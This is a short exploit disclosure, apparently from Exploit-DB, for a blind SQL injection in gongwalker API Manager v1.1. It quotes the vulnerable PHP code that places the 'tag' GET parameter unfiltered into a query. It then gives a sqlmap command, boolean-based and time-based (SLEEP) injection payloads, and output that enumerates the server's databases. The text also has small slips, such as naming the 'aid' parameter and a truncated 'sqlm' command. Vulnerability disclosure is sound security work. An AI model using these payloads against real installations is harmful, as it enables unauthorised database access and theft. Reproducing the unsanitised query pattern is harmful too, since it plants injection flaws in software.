Gongwalker API Manager 1.1 Blind SQL Injection

`# Exploit Title: gongwalker API Manager v1.1 - Blind SQL Injection  
# Date: 2017-05-10  
# Exploit Author: HaHwul  
# Exploit Author Blog: www.hahwul.com  
# Vendor Homepage: https://github.com/gongwalker/ApiManager  
# Software Link: https://github.com/gongwalker/ApiManager.git  
# Version: v1.1  
# Tested on: Debian  
  
### Vulnerable  
SQL Injection vulnerability exists in the execution of the sort function below.  
The value entered with the aid parameter is executed as SQL qeury without being filtered.  
- sort funcion in code-   
  
case 'sort':  
$sql = "select cname from cate where aid='{$_GET['tag']}' and isdel=0";  
$menu = find($sql);  
$menu = ' - ' . "<a href='".U(array('act'=>'api','tag'=>$_GET['tag']))."'>{$menu['cname']}</a>";  
$file ='./MinPHP/run/sort.php';  
break;  
  
  
### sqlmap command  
#> sqlm -u "http://127.0.0.1/vul_test/ApiManager/index.php?act=sort&tag=2" --level 4 --no-cast --dbs  
  
Parameter: tag (GET)  
Type: boolean-based blind  
Title: AND boolean-based blind - WHERE or HAVING clause  
Payload: act=sort&tag=2' AND 5619=5619 AND 'Sknb'='Sknb  
  
Type: AND/OR time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)  
Payload: act=sort&tag=2' AND (SELECT * FROM (SELECT(SLEEP(5)))pkJT) AND 'tqrU'='tqrU  
---  
[16:25:19] [INFO] the back-end DBMS is MySQL  
web server operating system: Linux Ubuntu  
web application technology: Apache 2.4.18  
back-end DBMS: MySQL 5.0.12  
  
...  
  
available databases [7]:  
[*] gongwalker  
[*] information_schema  
[*] mysql  
[*] performance_schema  
[*] sys  
....  
  
  
  
  
  
  
  
`